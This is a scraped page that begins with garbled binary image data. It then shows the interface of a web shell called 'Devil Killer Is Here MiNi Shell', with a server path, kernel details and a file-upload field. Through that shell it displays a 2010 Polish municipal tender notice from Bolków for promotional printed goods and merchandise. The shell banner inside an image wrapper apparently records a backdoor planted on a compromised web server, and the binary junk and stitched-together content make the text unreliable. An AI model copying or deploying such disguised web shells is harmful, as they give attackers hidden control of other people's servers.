JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100920/298630-N-2010.html

<p class="kh_header"><b>Bolków: Opracowanie i rozpowszechnianie materiałów promujących produkt kulturowy Bolkowa i regionu dolnośląskiego: Bolków - Rycerska Gmina, 
w ramach projektu współfinansowanego z Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Priorytet 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i kultura), Działanie 6.4. Turystyka kulturowa</b><br>
<b>Numer ogłoszenia: 298630 - 2010; data zamieszczenia: 20.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bolków , ul. Rynek 1, 59-420 Bolków, woj. dolnośląskie, tel. 0-75 7413213, 7413215 w. 15, faks 0-75 7413394.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bolkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i rozpowszechnianie materiałów promujących produkt kulturowy Bolkowa i regionu dolnośląskiego: Bolków - Rycerska Gmina, 
w ramach projektu współfinansowanego z Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Priorytet 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i kultura), Działanie 6.4. Turystyka kulturowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie oraz dostawa materiałów promujących produkt kulturowy Bolkowa i regionu dolnośląskiego: Bolków Rycerska Gmina  w zakresie działania 6.4 Turystyka kulturowa, Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007- 2013.
Wykaz artykułów :
1.	Ulotki (foldery) - nakład 6 000 szt. 
Materiał: papier kreda 150 g. 
Wymiary: format A4, składana do DL
Wykończenie: projekt przygotowany przez Zleceniobiorcę na podstawie materiałów przekazanych przez Zamawiającego, zawierających zdjęcia (wybór zdjęć w oparciu o kryteria zamawiającego), treść, która ma zostać zamieszczona oraz logo Unii Europejskiej i logo Bolków- Rycerska Gmina.
Ulotka wydana w języku polskim;
kolor 4+4 CMYK;

2.	Ulotki (folder)- nakład 6000 szt.
Materiał: papier kreda 150g. 
      Wymiary: format A4, składana do DL
Wykończenie: projekt przygotowany przez Zleceniobiorcę na podstawie materiałów          przekazanych przez Zamawiającego, zawierający zdjęcia (wybór zdjęć w oparciu o kryteria zamawiającego), treść, która ma zostać zamieszczona (w językach obcych) oraz logo Unii Europejskiej i logo Bolków- Rycerska Gmina
      Ulotka wydana w języku: czeskim, angielskim i niemieckim.
      Kolor: 4+4 CMYK;


3.	Pinsy- nakład 2000 szt.
Wymiary: okrąg - średnica znaczka  ok. 19 mm, wielkość grafiki - 17 mm
Wykończenie: metalowe, znakowanie full kolor, z logiem Unii Europejskiej oraz  Bolków- Rycerska Gmina, grafika w pinsach zabezpieczona przed uszkodzeniami warstwą (płytką) akrylu, który dodatkowo powoduje efekt wypukłości, standardowe zapięcie. Wykonanie projektu graficznego leży po stronie Zamawiającego. 

4.	Puzzle- nakład 300 szt.
Format A3, 120 elementów
Wykończenie: z tekturki ok. 1,6 mm, wydruk cyfrowy na papierze fotograficzny semi. mat. 170 g. uwzględniający dziedzictwo kulturowe Gminy Bolków, trwałe, wygodne i eleganckie opakowanie z przednim nadrukiem, 1 rodzaj, full kolor, grafika dostarczona przez Zamawiającego uwzględniająca tytuł projektu, Logo Unii Europejskiej oraz  logo Bolków- Rycerska Gmina.

5.	Podkładka pod kubek- nakład 1 500 szt.
Format: koło o średnicy 10 cm
Wykończenie: zgrzewana, tektura  ok. 1 mm, koszerowana od góry laminowanym nadrukiem, od spodu korkiem o grubości 1mm. Grafika dostarczona przez zamawiającego uwzględniająca  tytuł projektu, logo Unii Europejskiej i  logo Bolków- Rycerska Gmina.
Kolor CMYK 4+4

6.	Torby ekologiczne z nadrukiem- nakład 2 000 szt.
Wymiary ok.  38 x 42 cm
Torba bawełniana z wkładką utrzymującą dno oraz długim uchem, kolor naturalny. Nadruk trwały, grafika dostarczona przez zamawiającego uwzględniająca tytuł projektu, logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Nadruk jednokolorowy.

7.	Magnes reklamowy- nakład 1500 szt. 
O średnicy  ok. 56 mm wykonane w całości z metalu.
Wykończenie znaczka magnes. Nadruk w pełnym kolorze, laminowany, grafika dostarczona przez zamawiającego z tytułem projektu oraz logiem Unii Europejskiej i Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego.


8.	Teczki ofertowe- nakład 3 000 szt.
Druk pełno kolorowy jednostronny
pozwalający na dowolne opracowanie graficzne, czyli umieszczanie grafik, znaków, zdjęć, tekstów w dowolnych kolorach. Teczki ofertowe drukowane jednostronnie (łącznie z klapkami). 
Wymiary ok.  303x215 mm (po złożeniu), optymalny wymiar pozwalający włożyć do teczki ofertę A4. Na dolnej klapce miejsce na wizytówkę lub kalendarzyk.
Folia błysk z jednej strony 
Zabezpieczenie i zwiększenie trwałości folią błyszczącą. Grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego.

9.	Kartki pocztowe- nakład 3 500 szt.
Format A6 (105x148 mm), papier kreda 300 g, druk full kolor 4+4 CMYK, na awersie foliowanie błyszczące, druk w pakietach 3 wzory po 1000 szt., 1 wzór 500 szt., grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego

10.	Breloki- nakład 1 000 szt.
Brelok metalowy żywicowany podwójny ( ok. 4,5 cm x 2,5 cm) z wklejką wykonaną w oparciu o druk cyfrowy. Grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i logo Bolków- Rycerska Gmina. Propozycja projektu graficznego leży po stronie Zamawiającego. Druk l kolor CMYK 4+4.

11.	Długopisy- nakład 1 500 szt.
Metalowy,  długość ok. 14 cm, kolor czarny, niebieski i srebrny po 500 szt., wkład niebieski nadruk jednostronny uwzględniający  logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Przygotowanie projektu graficznego leży po stronie Zamawiającego. Nadruk jednokolorowy.

12.	Mapa Bolków - Rycerska Gmina z zaznaczonymi i opisanymi zabytkami dziedzictwa kulturowego Gminy Bolków oraz z planem miasta. Nakład 8 000 szt.
Przygotowanie projektu graficznego leży po stronie wykonawcy. Mapa powinna uwzględniać najciekawsze zabytki dziedzictwa kulturowego Gminy Bolków. Po stronie wykonawcy leży opracowanie projektu, wykonanie i druk mapy gminy Bolków wraz z planem miasta. Zaznaczone na niej będą szlaki turystyczne (kulturowe) przebiegające przez Gminę oraz opisane najciekawsze walory dziedzictwa kulturowego. 
Wykonaniem i dostarczeniem wszelkich fotografii i opisów, które będą umieszczone na mapie zostaną dostarczone przez Wykonawcę. 
Mapa  wydrukowana na papierze nie gorszym jak Gprint 115 g mat, druk CMYK 4+4,  w formacie  ok. 640x450 mm, złożonym do formatu 125x225 mm. 



13.	Teczki promocyjne- 1 000 szt. 
Druk pełno kolorowy jednostronny pozwalający na dowolne opracowanie graficzne, czyli umieszczanie grafik, znaków, zdjęć, tekstów w dowolnych kolorach. Teczki ofertowe drukowane jednostronnie (łącznie z klapkami). 
Wymiary ok.  20x34x10 cm (po złożeniu), optymalny wymiar pozwalający włożyć do teczki ofertę A4. Na dolnej klapce miejsce na wizytówkę lub kalendarzyk.
Folia błysk z jednej strony 
Zabezpieczenie i zwiększenie trwałości folią błyszczącą. Grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego. 

14.	Widokówki- nakład 8.000 szt. 
Format A5, 4 wzory po 2.000 szt.
Papier kreda 300 g, druk full kolor 4+4 CMYK, na awersie foliowanie błyszczące, druk grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego.

15.	Album z fotografiami produktu kulturowego Bolkowa: Bolków Rycerska Gmina- nakład 500 szt.
Format  ok. 21,6 x 30,5, ilość stron 32, papier kreda błysk, 150g/m2, druk: przód CMYK 4+4, tył CMYK oklejka. Papier: kreda błysk. Wykończenie folia błysk, oprawa twarda. Projekt przygotowany i złożony przez wykonawcę na podstawie materiałów przekazanych przez zamawiającego, uwzględniający tytuł projektu oraz logo Unii Europejskiej i Bolków Rycerska Gmina. Dostarczeniem fotografii i opisów do albumu leży po stronie Zamawiającego.

16.	Kolorowanka edukacyjna- nakład 500 szt.
Format A4, ilość stron 10, grafika wykonana przez zamawiającego, za skład odpowiada Wykonawca. Uwzględniająca tytuł projektu oraz logo Unii Europejskiej i Bolków Rycerska Gmina. 

17.	Znaczki- plakietki- nakład 1 000 szt.
Średnica ok.  32 mm, przypinanie agrafka. Uwzględniająca tytuł projektu oraz logo Unii Europejskiej i Bolków Rycerska Gmina. Za dostarczenie projektu graficznego odpowiada Wykonawca.

18.	Stojak na ulotki- nakład 1 szt.
ZYGZAK A4, składany, umieszczony w podręcznej aluminiowej walizce. Składający się z 7 przegródek. Konstrukcja aluminiowa.


19.	Stojak na ulotki- nakład 1 szt.
Cztery kieszenie umieszczone pionowo, format A6, wykonany z plastiku.

20.	Stojak na ulotki- nakład 1 szt.
Cztery kieszenie umieszczone poziomo, format A6, konstrukcja stabilna wykonana z plastiku.

21.	Stojak na ulotki- nakład 1 szt.
Format kieszeni na ulotki DL x 6, stojak jednostronny, stabilny z możliwością zamontowania na stałe po 1 egzemplarzu ulotki. Rama z anodowanego aluminium. Podstawa 24x32, wysokość 180 cm .  

22.	Stojak na ulotki- nakład 2 szt.
Format na ulotki A5. Stojak jednostronny, stabilny, z sześcioma kieszeniami. Wykonany z plastiku. 

23.	Stempel suchy- nakład 1 szt.
Gotowy do użycia, średnica  ok. 42 mm, zaciąg 11 cm, projekt przygotowany przez wykonawcę uwzględniający logo Unii Europejskiej oraz logo Bolków- Rycerska Gmina, z bocznymi ogranicznikami, pozwalającymi na ustalenie stałej odległości wsuwania kartki, używany także do grubszych papierów.
W skład stempla wchodzi
- prasa do odciskania;
- wymienne ramiona do mocowania matrycy
- wygenerowana matryca

24.	Nożyki do kopert- nakład 500 szt. 
Metalowe z umieszczoną ok.  16 mm wklejką, projekt przygotowany przez wykonawcę uwzględniający logo Unii Europejskiej oraz logo Bolków- Rycerska Gmina

25.	Książka Bolków na starych widokówkach- nakład 2 000 szt.
Projekt przygotowany przez wykonawcę uwzględniający dziedzictwo i produkt kulturowy Gminy przedstawiony na starych widokówkach z logo Unii Europejskiej oraz logo Bolków Rycerska Gmina. Za dostarczenie materiałów i treści, które mają być umieszczone w książce odpowiada Zamawiający. Okładka twarda, ilość stron 98, papier kreda błysk, 150g/m2, wymiar  ok. 21x17 cm, full kolor CMYK 4+4. Projekt musi uwzględniać logo Unii Europejskiej oraz logo Bolków- Rycerska Gmina.   

26.	Pieczątka promocyjna- nakład 1 szt.
Format ok. 7x3 cm Projekt przygotowany przez Zamawiającego, uwzględniający dziedzictwo i produkt kulturowy Gminy z logo Unii Europejskiej i logo Bolków- Rycerska Gmina. 


27.	Torby papierowe- nakład 1 000 szt.
Wymiar  ok. 20x34x10, projekt graficzny przygotowany przez Zamawiającego. Projekt musi uwzględniać logo Unii Europejskiej oraz logo Bolków- Rycerska Gmina. Torba koloru naturalnego lub biała, nadruk jednostronny jednokolorowy (czarny).

28.	Kubki- nakład 500 szt.
Kolor  kubka niebieski z białym wnętrzem, ceramiczny, grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny leży po stronie Zamawiającego.
Wysokość:  ok. 95 mm
Średnica: ok.  80 mm
Pojemność: ok. 0,33 l
Nadruk: jednostronny, jednokolorowy (biały)

29.	Smycze- nakład 1 500 szt.
Materiał ekologiczny, dowolna ilość kolorów, jednostronny nadruk, barwione jednostronnie,  szerokość ok. 15 mm, projekt przygotowany  przez zleceniodawcę uwzględniający logo Bolków Rycerska Gmina oraz logo Unii Europejskiej. 
Smycz powinna zawierać karabińczyk metalowy na kluczyk lub identyfikator, oraz zawieszkę na telefon/ mp3.

30.	Notesy promocyjne- nakład 2 000 szt.
Format A6, ilość kartek w jednym notesie 100 szt. , papier 80 gr., klejone po krótkim boku z kartonikiem od spodu. Projekt graficzny przygotowany przez Zleceniodawcę, uwzględniający logo Bolków Rycerska Gmina oraz logo Unii Europejskiej.

31.	Torby papierowe- nakład 1 000 szt.
Format ok.  20x34x10, kolor torby granatowy, nadruk jednostronny, jednokolorowy (biały), uwzględniający logo Unii Europejskiej oraz  logo Bolków- Rycerska Gmina. Projekt graficzny zostanie przygotowany przez Zleceniodawcę. 

32.	Ołówki - nakład 1500 szt.
Drewniany, w kolorze czarnym, z gumką, długość ok.  18 cm, średnica ok. 0,8 cm, twardość rysika HB lub B. Nadruk jednostronny, jednokolorowy (biały lub złoty) uwzględniający logo Unii Europejskiej. Projekt graficzny zostanie przygotowany przez Zamawiającego.

33.	Długopisy z makulatury- nakład 2 000 szt.
Materiał: makulatura
Kolor szary lub naturalny, wkład niebieski, nadruk jednostronny, jednokolorowy (czarny) uwzględniający logo Unii Europejskiej. 
Wymiary  ok. 4,5x0,8 cm


34.	Stoisko promocyjne ścianka pop up- 1 szt.
Całkowita wielość grafiki  ok. W414xH230 cm, liczba paneli 4x2, taśmy magnetyczne, dwa reflektory na wysięgnikach. Całość zapakowana w dużą transportową walizę transportową  na kółkach arkusze z PCV. Grafika uwzględniająca dziedzictwo kulturowe Gminy Bolków oraz logo Unii Europejskiej i  logo Bolków- Rycerska Gmina. Projekt graficzny zaprojektowany przez zleceniobiorcę. 
Dodatkowe wymagania:
1.	Artykuły muszą być nowe, pełnowartościowe, w pierwszym gatunku.
2.	Gwarancja 12 miesięcy od dnia ostatecznego odbioru przedmiotu zamówienia.
3.	Podstawą wystawienia faktury ostatecznego rozliczenia będzie protokół ostatecznego odbioru. Zamawiający uzna zamówienie za wykonane, jeżeli przedmiot zamówienia będzie odebrany bez usterek i spełniał będzie warunki jego przeznaczenia. 
4.	Z wybranym wykonawcą zostanie zawarta umowa obejmująca zakres rzeczowy zamówienia określony w niniejszej specyfikacji istotnych warunków zamówienia. 
5.	Zakres zamówienia obejmuje:
- wykonanie artykułów zgodnie z wymogami techniczno ilościowymi zawartymi w Specyfikacji Istotnych Warunków Zamówienia oraz według wzorów graficznych umieszczonych w załącznikach;
- dostawę artykułów do siedziby zamawiającego w Bolkowie, przy ulicy Rynek 1;
- umieszczenie na artykułach, wymaganych przez Zamawiającego, trwałych nadruków odpowiednich logotypów zgodnie z zasadami wizualizacji Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 w ramach Narodowej Strategii Spójności (aktualny dokument w wersji elektronicznej dostępny pod adresem http://dolnyslask.pl/default.aspx?docId=3560 oraz z opisem produktów zawartym w SIWZ.
8. Warunki realizacji i odbioru przedmiotu zamówienia:
- przed przystąpieniem do produkcji docelowej artykułów objętych przedmiotem zamówienia, nie uwzględniających projektu graficznego dostarczonego przez Zamawiającego wybrany Wykonawca przedstawi Zamawiającemu do akceptacji próbne egzemplarze każdego z oferowanych artykułów, wykonanych zgodnie z wymogami technicznymi. Zamawiający dokona wyboru i akceptacji projektów graficznych lub zgłosi do nich uwagi w terminie 4 dni roboczych od dnia ich otrzymania;
Wykonawca dokona wskazanych przez Zamawiającego zmian lub poprawek do przedstawionych projektów graficznych w terminie dwóch dni roboczych od dnia ich otrzymania.
9. Wszystkie artykuły w poszczególnych etapach prac wykonawczych Wykonawca będzie odbierał i dostarczał na własny koszt.
10. Wszystkie artykuły muszą spełnić łącznie następujące kryteria:
a) funkcjonalności, tj. spełnia swoje przeznaczenie
b) trwałości, tj. czy produkt nie ulega trwałym zniekształceniom np. podczas ściskania palcem, nadruki muszą być trwałe;
c) estetyka, tj. jak pod względem estetycznym produkt został wykonany np.:
- czy nie występują zarysowania, przebarwienia pęknięcia, ewentualnie inne uszkodzenia artykułu (odpowiednio do rodzaju artykułu)
- czy poszczególne części artykułu są dobrze do siebie dopasowane, zamocowane (np. końcówka długopisu nie odpada z osady podczas pisania);
- czy graficzne elementy artykułu nie są rozmazane, popękane ani nie zmieniają kolorów podczas pocierania ręką;
- czy krawędzie artykułów są wykończone
- czy zamieszczone  logotypy są widoczne i odpowiednio wyeksponowane;
11. Dostarczone artykuły będą spełniały wymagania zamawiającego, jeżeli ich jakość będzie odpowiadała co najmniej jakości próbek, zatwierdzonych do produkcji przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest przed upływem terminu składania ofert tj.: nie później niż do dnia 27.09.2010r. do godz. 900, do wniesienia wadium w wysokości 2.000,00 PLN (słownie: dwa tysiące złotych). 
Forma wadium
1) Wadium może być wniesione w następujących formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42, poz. 275).
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),
gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego gdy Wykonawca:
- odmówił podpisania umowy na warunkach określonych w ofercie lub
- nie wniósł zabezpieczenia należytego wykonania umowy lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niezależnych od Wykonawcy;
- gwarancja lub poręczenie mają zawierać zapis: nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego.
Miejsce i sposób wniesienia wadium.
1) Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Bank Spółdzielczy Jawor Oddział Bolków, Rynek 1,
nr: 84 8647 1059 0400 0518 2004 0005 przed upływem terminu składania ofert, z dopiskiem Przetarg -Opracowanie i rozpowszechnianie materiałów promujących produkt kulturowy Bolkowa i regionu dolnośląskiego: Bolków- Rycerska Gmina.
Do oferty należy dołączyć kopię polecenia przelewu.
2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć:
a) w oryginale w osobnej kopercie wraz z ofertą oraz
b) w postaci kopii dołączonej do oferty
Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert. 
Dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże iż wykonał w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie dostawy, odpowiadające swoim rodzajem i charakterem dostawom stanowiącym przedmiot zamówienia o wartości min.50.000,00 tys. złotych brutto łącznie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, oraz załącznika dokumentów potwierdzających, że te dostawy zostały wykonane należycie. Wzór wykazu stanowi załącznik nr 4 do SIWZ. 
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zmówienia, oceniane będzie ich łączne doświadczenie.
W tym celu należy dołączyć Wykaz wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert dostaw zgodnie z pkt. 3, rozdz. V SIWZ (załącznik nr 4 do SIWZ) wraz z dokumentami potwierdzającymi, że dostawy te zostały wykonane prawidłowo, a jeżeli okres prowadzenia działalności jest krótszy - w okresie prowadzenia działalności. Załączone dokumenty mają potwierdzać datę wykonania zamówień, wartość, lokalizację, odbiorcę. Wykonawcy składający ofertę wspólną przedkładają jeden wspólny wykaz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże iż:
a)	posiada zdolności kredytowe lub środki finansowe na kwotę nie niższą 50 tys.  PLN (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa).
b)	Jest ubezpieczony od odpowiedzialności cywilnej (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców w zakresie prowadzonej działalności na kwotę o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa).
